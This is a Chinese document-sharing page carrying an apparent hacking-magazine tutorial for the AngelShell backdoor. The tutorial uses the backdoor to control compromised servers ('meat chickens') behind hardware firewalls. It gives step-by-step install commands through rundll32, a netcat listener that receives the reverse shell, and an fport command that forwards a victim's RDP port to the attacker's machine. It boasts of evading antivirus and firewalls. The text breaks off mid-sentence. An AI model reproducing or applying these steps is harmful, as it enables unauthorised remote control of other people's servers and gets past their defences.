欢迎来到天天文库
浏览记录
ID:18465075
大小:56.00 KB
页数:5页
时间:2018-09-18
《让所有正向程序实现反向连接》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、让所有正向程序实现反向连接(应用篇)适合读者:入侵爱好者、黑客工具爱好者前置知识:3389终端使用方法、Radmin使用方法蝴蝶:硬件防火墙是入侵和控制肉鸡的噩梦,而能饶过防火墙的反向连接后门又有诸多不便,常长莫名其妙地罢工——这样的日子即将过去!我们这次用的后门,不仅要让它自己能够实现反向连接,而且要让其它所有的能正向连接的程序都实现反向连接,比如终端服务、Radmin、MSSQL等!吃惊?不用的,只是你没想到、别人没写出来程序而已!AngelShell:让所有正向程序实现反向连接(应用篇) 现在的服务器几乎全是放在硬件防火墙后的,好不容易渗透进去,结果却发现装有硬件防火墙,扫
2、兴啊!什么终端服务、什么Radmin之类的控方式想都不要想。试了试,发现几乎都支持反向连接,正向连接只能连接80和21端口,连1433都连不上。那就传个反向的后门上去吧,一传上去就被杀毒软件Kill了。一气之下,搬出Delphi,自己动手写后门!花了几天的时间,后门终于写好了,也达到了理想中的要求,使用效果非常不错,足以称为硬件防火墙和内网肉鸡的噩梦了!不敢独享,赶紧拿出来给大家共同分享一下。 这个程序叫AngelShell,这里用我的肉鸡和自己使用的计算机做测试。首先需要在本地配置一个记载反向连接信息的文件,第一行是自己的IP,第二行是用NC监听的端口。写好后把它放到HTTP空
3、间上,然后进行配置:配置好密码和你刚才上传到FTP空间里的HTTP访问地址,如图1所示。图1 你可以选择生成DLL的服务端或者EXE的服务端,其中EXE的服务端直接运行即可安装,而DLL的服务端则需要用如下命令安装:“rundll32dll路径,I”,记得最后一个I一定要大写。小提示:程序作者其实是为了方便大家才提供的EXE服务端,其本质也是安装DLL程序,只不过是用程序来解包并自动实现安装。 这里我以DLL服务端来示范。先把DLL传到心爱的肉鸡上面,然后在命令行上面打入:“rundll32angel.dll,I”。注意这里我是通过FTP连接上肉鸡的,为了方便就直接用F
4、TP的命令行安装了,如图2所示。图2 装好以后,在自己的机器上用:“nc–v–l–p7787”监听7787端口,也就是我最开始写的配置文件里的端口。过了一会NC就提示有信息传输,输入密码敲回车,OK,连接成功。帮助信息显示后,可爱的Shell出来了。如图3所示。图3 小提示:这个后门还提供了一些附加命令,可以直接在Shell中执行。作者为了避免与已有的程序名冲突,所以附加命令全部为小写。 讲到这里,大家也许会觉得偶这款后门除了可以生成EXE服务端以外,也没什么特别的。当然,就这些功能当然不够打造出我的特色,也不能算是硬件防火墙的噩梦。我们这次用的后门,
5、不仅是要让它自己能够实现反向连接,而且要让其它所有的能正向连接的程序都实现反向连接,比如终端服务、Radmin、MSSQL等等!呵呵,不要吃惊,好戏正在后头呢,偶不会让大家失望的,Let’sGO! 看到Shell里的Fport附加命令没有?也就是端口转发,它可以把远程计算机的任意端口反向模拟到本地来。什么?你没懂?呵呵,没关系,往下看就知道了。我们先来测试一下Windows的终端服务。这台肉鸡以前就被我开过终端服务了,但一直苦于硬件防火墙的拦截而无法连接,今天要好好爽一下!小知识:Fport的用法:fport其中参数loca
6、lport是指你在肉鸡上要转发的端口,YourIP是你的IP(或域名,YourPort是指你的客户端上监听的端口。打开客户端,在“要模拟的端口”上面填3389,在“连接远程计算机的端口”上任意填,当然不要与已开的端口冲突,这里我填7788,然后点“开始监听”。赶紧到肉鸡的Shell下面敲入:“fport338961.187.***.***7788”。其中3389是肉鸡的终端服务的端口,7788是我们这边这个连接远程计算机的端口。然后客户端上马上提示已接收到远程计算机的连接,提示此时已经可以连接本地的3389端口了。这样我们就把肉鸡上的3389端口搬到自己的爱机上来了,如图4所示。 图
7、4 朋友们,我们还等什么呢?打开终端服务登录器,IP填上本地的127.0.0.1,连接,客户端马上显示已经成功建立了一个新的连接,并出现了远程桌面登录的对话框,我心里那个激动啊,真是语言无法表达!我们再试试登录两个用户,客户端又显示成功建立了一个新的连接。事实证明,同时登录2个用户也成功了!当然,如果你愿意的话可以登录更多的用户,我编程的时候设置的每个连接都通过2个线程来进行数
此文档下载收益归作者所有